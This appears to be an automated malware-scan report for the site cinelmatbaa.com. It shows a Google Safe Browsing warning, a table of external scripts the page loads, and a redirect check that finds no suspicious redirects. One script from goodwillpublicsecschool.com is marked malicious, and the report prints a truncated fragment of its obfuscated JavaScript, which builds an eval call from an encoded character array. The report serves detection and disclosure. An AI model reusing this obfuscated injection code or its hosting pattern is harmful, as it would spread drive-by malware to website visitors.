Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=cinelmatbaa.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://cinelmatbaa.com/ | 200 OK Content-Length: 7631 Content-Type: text/html | clean |
http://opojg.info/mltools.js | 500 Can't connect to opojg.info:80 Content-Length: 185 Content-Type: text/plain | clean |
http://opojg.info/test404page.js | 500 Can't connect to opojg.info:80 Content-Length: 185 Content-Type: text/plain | clean |
http://ja.czest.pl/mltools.js></script><script type= | 500 Can't connect to ja.czest.pl:80 Content-Length: 186 Content-Type: text/plain | clean |
http://upload.sinhvienhuongkhe.net/mltools.js | 500 Can't connect to upload.sinhvienhuongkhe.net:80 Content-Length: 202 Content-Type: text/plain | clean |
http://goodwillpublicsecschool.com/jstools.js | 200 OK Content-Length: 4241 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var s=new String();a=(new Function("","")+"").substr(2-1,4);if((a=="func")||(a=="unct"))a=(document.createDocumentFragment+"").substr(2-1,4);if((a=="func")||(a=="unct")){r=1;c=String;}if(r&&document.createTextNode)y=2;e=window['e'+'val'];m=new Array(4.5*y,18/y,52.5*y,204/y,16*y,80/y,50*y,222/y,49.5*y,234/y,54.5*y,202/y,55*y,232/y,23*y,206/y,50.5*y,232/y,34.5*y,216/y,50.5*y,218/y,50.5*y,220/y,58*y,230/y,33*y,242/y,42*y,194/y,51.5*y,156/y,48.5*y,218/y,50.5*y,80/y,19.5*y,196/y,55.5*y,200/y, Antivirus reports:
| ||
http://hypotheek-overzicht.net/tempjs.js | 500 Can't connect to hypotheek-overzicht.net:80 Content-Length: 198 Content-Type: text/plain | clean |
http://infobox.kz/jstools.js | 404 Not Found Content-Length: 28640 Content-Type: text/html | clean |
http://infobox.kz/wp-includes/js/jquery/jquery.js?ver=1.11.1 | 200 OK Content-Length: 95807 Content-Type: application/x-javascript | clean |
http://infobox.kz/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.2.1 | 200 OK Content-Length: 7200 Content-Type: application/x-javascript | clean |
http://infobox.kz/wp-content/plugins/contact-form-7/includes/js/jquery.form.min.js?ver=3.51.0-2014.06.20 | 200 OK Content-Length: 15248 Content-Type: application/x-javascript | clean |
http://infobox.kz/wp-content/plugins/contact-form-7/includes/js/scripts.js?ver=4.0.2 | 200 OK Content-Length: 9658 Content-Type: application/x-javascript | clean |
http://infobox.kz/wp-content/themes/justlanded/scripts/jquery.flexslider.min.js?ver=1.4.1 | 200 OK Content-Length: 21545 Content-Type: application/x-javascript | clean |
http://infobox.kz/wp-content/themes/justlanded/scripts/custom.modernizr.min.js?ver=1.4.1 | 200 OK Content-Length: 9733 Content-Type: application/x-javascript | clean |
http://infobox.kz/wp-content/themes/justlanded/scripts/foundation.custom.min.js?ver=1.4.1 | 200 OK Content-Length: 12188 Content-Type: application/x-javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: cinelmatbaa.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sun, 14 Dec 2014 20:53:34 GMT
Accept-Ranges: bytes
ETag: "d465a8-1dcf-50062ce3"
Server: Apache/1.3.41 (Unix) mod_suid/1.1 PHP/5.3.5 with Suhosin-Patch mod_ssl/2.8.31 OpenSSL/0.9.8n
Content-Length: 7631
Content-Type: text/html
Last-Modified: Wed, 18 Jul 2012 03:26:27 GMT
...7631 bytes of data.
GET / HTTP/1.1
Host: cinelmatbaa.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sun, 14 Dec 2014 20:53:34 GMT
Accept-Ranges: bytes
ETag: "d465a8-1dcf-50062ce3"
Server: Apache/1.3.41 (Unix) mod_suid/1.1 PHP/5.3.5 with Suhosin-Patch mod_ssl/2.8.31 OpenSSL/0.9.8n
Content-Length: 7631
Content-Type: text/html
Last-Modified: Wed, 18 Jul 2012 03:26:27 GMT
...7631 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: cinelmatbaa.com
Referer: http://www.google.com/search?q=cinelmatbaa.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: cinelmatbaa.com
Referer: http://www.google.com/search?q=cinelmatbaa.com
Result:
The result is similar to the first query. There are no suspicious redirects found.